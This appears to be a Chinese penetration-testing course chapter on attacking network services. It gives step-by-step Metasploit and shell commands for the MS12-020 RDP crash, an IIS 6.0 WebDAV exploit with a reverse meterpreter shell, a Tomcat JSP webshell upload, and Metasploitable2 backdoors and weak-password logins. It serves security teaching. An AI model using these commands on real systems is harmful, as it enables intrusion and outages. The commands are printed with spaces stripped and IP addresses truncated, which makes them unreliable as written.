第7章-7.1-網(wǎng)絡(luò)服務(wù)滲透

網(wǎng)絡(luò)服務(wù)滲透滲透測試基于Web應(yīng)用系統(tǒng)的滲透雖然較為常見，但是除了常見的Web系統(tǒng)滲透測試外，還可以從網(wǎng)絡(luò)服務(wù)進(jìn)行滲透測試攻擊。前言網(wǎng)絡(luò)服務(wù)滲透攻擊簡介遠(yuǎn)程溢出藍(lán)屏DoS攻擊（CVE-2012-0002）IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）Tomcat任意文件上傳（CVE-2017-12615）網(wǎng)絡(luò)服務(wù)滲透是以遠(yuǎn)程主機(jī)運行的某個網(wǎng)絡(luò)服務(wù)程序為目標(biāo)，向該目標(biāo)服務(wù)開放端口發(fā)送內(nèi)嵌惡意內(nèi)容并符合該網(wǎng)絡(luò)服務(wù)協(xié)議的數(shù)據(jù)包，利用網(wǎng)絡(luò)服務(wù)程序內(nèi)部的安全漏洞，劫持目標(biāo)程序控制流，實施遠(yuǎn)程執(zhí)行代碼等行為，最終達(dá)到控制目標(biāo)系統(tǒng)的目的。網(wǎng)絡(luò)服務(wù)滲透攻擊是通過系統(tǒng)自帶的網(wǎng)絡(luò)服務(wù)、微軟服務(wù)、第三方服務(wù)的漏洞進(jìn)行滲透攻擊。網(wǎng)絡(luò)服務(wù)滲透以Windows系統(tǒng)平臺為例，根據(jù)網(wǎng)絡(luò)服務(wù)攻擊面的類別來區(qū)分，可將網(wǎng)絡(luò)服務(wù)滲透攻擊分為以下三類。針對Windows系統(tǒng)自帶網(wǎng)絡(luò)服務(wù)的滲透攻擊針對Windows系統(tǒng)上微軟網(wǎng)絡(luò)服務(wù)的滲透攻擊針對Windows系統(tǒng)上第三方網(wǎng)絡(luò)服務(wù)的滲透攻擊網(wǎng)絡(luò)服務(wù)滲透簡介1.針對Windows系統(tǒng)自帶網(wǎng)絡(luò)服務(wù)的滲透攻擊

在針對網(wǎng)絡(luò)服務(wù)滲透攻擊中，由于Windows系統(tǒng)的流行程度，使得Windows系統(tǒng)上運行的網(wǎng)絡(luò)服務(wù)程序成了高危對象，尤其是那些Windows系統(tǒng)自帶的默認(rèn)安裝、啟用的網(wǎng)絡(luò)服務(wù)，如SMB、RPC等。甚至有些服務(wù)對于特定服務(wù)器來說是必須開啟的，如一個網(wǎng)站主機(jī)的IIS服務(wù)。其中的經(jīng)典案例包括MS06-040、MS07-029、MS08-067、MS11-058、MS12-020等。網(wǎng)絡(luò)服務(wù)滲透簡介2.針對Windows系統(tǒng)上微軟網(wǎng)絡(luò)服務(wù)的滲透攻擊

微軟公司提供的網(wǎng)絡(luò)服務(wù)產(chǎn)品常見的有IISInternet服務(wù)、數(shù)據(jù)庫服務(wù)、Exchange電子郵件服務(wù)、MSDTC服務(wù)、DNS域名服務(wù)、WINS服務(wù)等。這些網(wǎng)絡(luò)服務(wù)中存在著各種各樣的安全漏洞，滲透測試中最常見的是針對IISInternet服務(wù)和數(shù)據(jù)庫服務(wù)的攻擊。IISInternet服務(wù)集成了HTTP、FTP、SMTP等諸多網(wǎng)絡(luò)服務(wù)。IIS6.0之前的版本包含大量的安全漏洞，其類型包括信息泄露、目錄遍歷、緩沖區(qū)溢出等。在IIS6.0推出后，安全性有較大提升，但仍然有不少高等級的安全漏洞，如IPP服務(wù)整數(shù)溢出漏洞MS08-062、導(dǎo)致FTP服務(wù)遠(yuǎn)程代碼執(zhí)行漏洞MS09-053、IIS認(rèn)證內(nèi)存破壞漏洞MS10-040等。網(wǎng)絡(luò)服務(wù)滲透簡介3.針對Windows系統(tǒng)上第三方網(wǎng)絡(luò)服務(wù)的滲透攻擊

在操作系統(tǒng)中運行的非系統(tǒng)廠商提供的網(wǎng)絡(luò)服務(wù)都可稱之為第三方網(wǎng)絡(luò)服務(wù)，與系統(tǒng)廠商提供的網(wǎng)絡(luò)服務(wù)沒有本質(zhì)區(qū)別，比較常見的包括：提供HTTP服務(wù)的Apache、IBMWebSphere、Tomcat等；提供SQL數(shù)據(jù)庫服務(wù)的Oracle、MySQL；以及提供FTP服務(wù)的Serv-U、FileZilla等。攻擊者在嘗試攻擊默認(rèn)系統(tǒng)服務(wù)未果之后，往往會通過掃描服務(wù)的默認(rèn)端口，來探測用戶系統(tǒng)是否使用一些常見的第三方服務(wù)，嘗試?yán)眠@些服務(wù)的弱點滲透對方系統(tǒng)。網(wǎng)絡(luò)服務(wù)滲透簡介網(wǎng)絡(luò)服務(wù)滲透攻擊簡介遠(yuǎn)程溢出藍(lán)屏DoS攻擊（CVE-2012-0002）IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）Tomcat任意文件上傳（CVE-2017-12615）

2012年爆出的CVE-2012-0002漏洞，也就是我們常說的MS12-020漏洞

，該漏洞存在于RDP服務(wù)的底層驅(qū)動文件Rdpwd.sys中，屬于內(nèi)核級漏洞。攻擊者經(jīng)過向遠(yuǎn)程主機(jī)的3389端口發(fā)送惡意數(shù)據(jù)包，導(dǎo)致服務(wù)程序使用一個不存在的指針，致使遠(yuǎn)程主機(jī)崩潰，達(dá)到拒絕服務(wù)攻擊的目的。受影響產(chǎn)品：

包括開啟RDP的MicrosoftWindowsXPProfessional、MicrosoftWindowsXPHome、MicrosoftWindowsServer2003StandardEdition、MicrosoftWindowsServer2003EnterpriseEdition、MicrosoftWindowsServer2003DatacenterEdition、MicrosoftWindows7。遠(yuǎn)程溢出藍(lán)屏DOS攻擊（CVE-2012-0002）1.使用Nmap對目標(biāo)進(jìn)行操作系統(tǒng)探測sudonmap-O32發(fā)現(xiàn)是WindowsServer2003sp2，在CVE-2012-0002影響范圍內(nèi)遠(yuǎn)程溢出藍(lán)屏DOS攻擊（CVE-2012-0002）2.利用msf尋找對應(yīng)漏洞利用模塊，使用check腳本對目標(biāo)進(jìn)行檢查，檢查系統(tǒng)是否存在MS12-020漏洞。遠(yuǎn)程溢出藍(lán)屏DOS攻擊（CVE-2012-0002）3.使用漏洞利用腳本進(jìn)行遠(yuǎn)程攻擊```useauxiliary/dos/windows/rdp/ms12_020_maxchannelidssetrhosts32Run```遠(yuǎn)程溢出藍(lán)屏DOS攻擊（CVE-2012-0002）網(wǎng)絡(luò)服務(wù)滲透攻擊簡介遠(yuǎn)程溢出藍(lán)屏DoS攻擊（CVE-2012-0002）IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）Tomcat任意文件上傳（CVE-2017-12615）IISInternet服務(wù)是微軟公司提供的網(wǎng)絡(luò)服務(wù)產(chǎn)品常見的服務(wù)之一，IISInternet服務(wù)集成了HTTP、FTP、SMTP等諸多網(wǎng)絡(luò)服務(wù)。IIS6.0之前的版本包含大量的安全漏洞，其類型包括信息泄露、目錄遍歷、緩沖區(qū)溢出等。IIS6.0默認(rèn)不開啟WebDAV，可是一旦開啟了WebDAV支持，WebDAV服務(wù)中的ScStorgPathFromUrl函數(shù)存在緩沖區(qū)溢出漏洞，遠(yuǎn)程攻擊者通過以“if:<http://"開頭的長headerPROPFIND請求，執(zhí)行任意代碼，危害極大。受影響產(chǎn)品：MicrosoftWindowsServer2003R2開啟WebDAV服務(wù)的IIS6.0IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）1.使用Nmap對目標(biāo)進(jìn)行詳細(xì)服務(wù)探測nmap-sV32IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）2.下載exp。地址如下：gitclone/Al1ex/CVE-2017-72693.將exploit移動到攻擊機(jī)中Metasploit的iis模塊下面sudomvcve-2017-7269.rb/usr/share/metasploit-framework/modules/exploits/windows/iis/cve_2017_7269.rbIIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）4.reload_all重新加載msf模塊，然后搜索相應(yīng)攻擊模塊IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）5.加載模塊，開始攻擊。命令如下：useexploit/windows/iis/cve_2017_7269setpayloadwindows/meterpreter/reverse_tcpsetrhost32setlhost31runIIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）6.成功獲取目標(biāo)系統(tǒng)權(quán)限IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）網(wǎng)絡(luò)服務(wù)滲透攻擊簡介遠(yuǎn)程溢出藍(lán)屏DoS攻擊（CVE-2012-0002）IIS6.0遠(yuǎn)程代碼執(zhí)行（CVE-2017-7269）Tomcat任意文件上傳（CVE-2017-12615）

Tomcat服務(wù)器是一個免費的開放源代碼的Web應(yīng)用服務(wù)器，屬于輕量級應(yīng)用服務(wù)器，在中小型系統(tǒng)和并發(fā)訪問用戶不是很多的場合下被普遍使用，是開發(fā)和調(diào)試JSP程序的首選。2017年9月19日，ApacheTomcat官方確認(rèn)一個高危漏洞CVE-2017-12615，在一定條件下，攻擊者可以利用這個漏洞，獲取用戶服務(wù)器上JSP文件的源代碼，或是通過精心構(gòu)造的攻擊請求，向用戶服務(wù)器上傳惡意JSP文件，通過上傳的JSP文件，可在用戶服務(wù)器上執(zhí)行任意代碼，從而導(dǎo)致數(shù)據(jù)泄露或獲取服務(wù)器權(quán)限，存在高安全風(fēng)險。受影響產(chǎn)品：ApacheTomcat7.0.0-7.0.79(windows環(huán)境)Tomcat任意文件上傳（CVE-2017-12615）1.使用Nmap對目標(biāo)進(jìn)行詳細(xì)服務(wù)探測nmap-sV32發(fā)現(xiàn)目標(biāo)是Windows主機(jī)并且8080端口是Tomcat服務(wù).Tomcat任意文件上傳（CVE-2017-12615）Tomcat任意文件上傳（CVE-2017-12615）2.使用dirb工具對web目錄進(jìn)行掃描，發(fā)現(xiàn)Tomcat后臺目錄為rootdirb32:8080/root/-wordlsit/usr/share/wordlists/dirb/big.txt3.使用whatweb對目標(biāo)Tomcat進(jìn)行信息搜集，發(fā)現(xiàn)是7.0.40版本，在CVE-2017-12615漏洞影響范圍內(nèi)whatweb32:8080/root/Tomcat任意文件上傳（CVE-2017-12615）Tomcat任意文件上傳（CVE-2017-12615）4.抓包上傳一個內(nèi)容為test的shell.jsp測試文件，服務(wù)器響應(yīng)404錯誤Tomcat任意文件上傳（CVE-2017-12615）5.在上傳文件后加/，服務(wù)器響應(yīng)201Created，成功上傳Tomcat任意文件上傳（CVE-2017-12615）6.上傳簡單的jsp木馬，命令執(zhí)行Metasploitable2虛擬系統(tǒng)是一個特別制作的ubuntu操作系統(tǒng)，本身設(shè)計作為安全工具測試和演示常見漏洞攻擊，比上一個版本包含更多可利用的安全漏洞。這個版本的虛擬系統(tǒng)兼容VMware，VirtualBox和其他虛擬平臺。默認(rèn)開放賬號：普通用戶：msfadmin密碼：msfadminMetasploitable2-Linux網(wǎng)絡(luò)服務(wù)滲透實踐使用metasploit對linux主機(jī)metasploitable-linux2進(jìn)行信息收集。命令如下：nmap–sV90信息收集默認(rèn)賬號密碼：msfadmin/msfadmin。命令如下：telnet90telnet弱口令登錄默認(rèn)mysql數(shù)據(jù)庫root用戶空密碼。命令如下：mysql-h90-uroot-pMysql弱口令登錄Postgres數(shù)據(jù)庫默認(rèn)賬號口令：postgres/postgres。命令如下：psql-h90-UpostgresPostgresql弱密碼登錄vnc弱口令密碼：password。命令如下：vncviewer90vnc弱口令登錄TCP端口512,513和514為著名的rlogin提供服務(wù)。在系統(tǒng)中被錯誤配置從而允許遠(yuǎn)程訪問者從任何地方訪問。使用msfadmin賬號進(jìn)行登錄。命令如下：rloginmsfadmin@90Rlogin錯誤配置漏洞Metasploitable2

在21端口上運行著vsftpd服務(wù)，一個使用廣泛的FTP服務(wù)。這個特別的版本包含一個后門允許一個未知的入侵者進(jìn)入核心代碼。如果在發(fā)送的用戶名后面加上”：）”（笑臉符號），這個版本的后門會在6200端口上打開一個監(jiān)聽的shell。Metasploit命令如下：useexploit/unix/ftp/vsftpd_234_backdoorsetrhost90exploitvsftpd后門某些鏡像站點的UnrealIRcd，在DEBUG3_DOLOG_SYSTEM宏中外部引入的惡意代碼，遠(yuǎn)程攻擊者能夠執(zhí)行任意代碼。在Metasploitable2

的6667端口上運行著UnreaIRCD

IRC的守護(hù)進(jìn)程。通過在一個系統(tǒng)命令后面添加兩個字母”AB“發(fā)送給被攻擊服務(wù)器任意一個監(jiān)聽該端口來觸發(fā)。Metasploit命令如下：useexploit/unix/irc/unreal_ircd_3281_backdoorsetpayloadcmd/unix/reverse_perlsetrhost90setlhost31exploitUnrealRCDIRC漏洞Samba的sambd默認(rèn)配置在可寫文件共享時，存在目錄遍歷漏洞，遠(yuǎn)程用戶可以通過smbclient端使用一個對稱命，創(chuàng)建一個包含..的目錄遍歷符的軟連接，可以進(jìn)行目錄遍歷以及訪問任意文件。Metasploit命令如下：useauxiliary/admin/smb/samba_symlink_traversalsetrhosts90setsmbsharetmpexploitSamba默認(rèn)配置目錄遍歷漏洞攻擊成功后，利用smbclient進(jìn)行連接，無需root密碼即可訪問資源。命令如下：smbclient//90/tmpSamba默認(rèn)配置目錄遍歷漏洞Samba中負(fù)責(zé)在SAM數(shù)據(jù)庫更新用戶口令的代碼未經(jīng)過濾便將用戶輸入傳輸給了/bin/sh。如果在調(diào)用smb.conf中定義的外部腳本時，通過對/bin/sh的MS-RPC調(diào)用提交了惡意輸入的話，就可能允許攻擊者以nobody用戶的權(quán)限執(zhí)行任意命令。Metasploit命令如下：useexploit/multi/samba/usermap_scriptsetrhosts90exploitSambaMS-RPCShell命令注入漏洞程序監(jiān)聽在1524端口，連接到1524端口就可以直接獲得root權(quán)限。命令如下：telnet901524Ingreslock后門JavaRMIServer的RMI注冊表和RMI激活服務(wù)的默認(rèn)配置存在安全漏洞，可被利用導(dǎo)致代碼執(zhí)行,服務(wù)運行端口1099。Metasploit命令如下：useexploit/multi/misc/java_rmi_serversetrhosts90exploit攻擊成功后，會建立一個session，使用sessions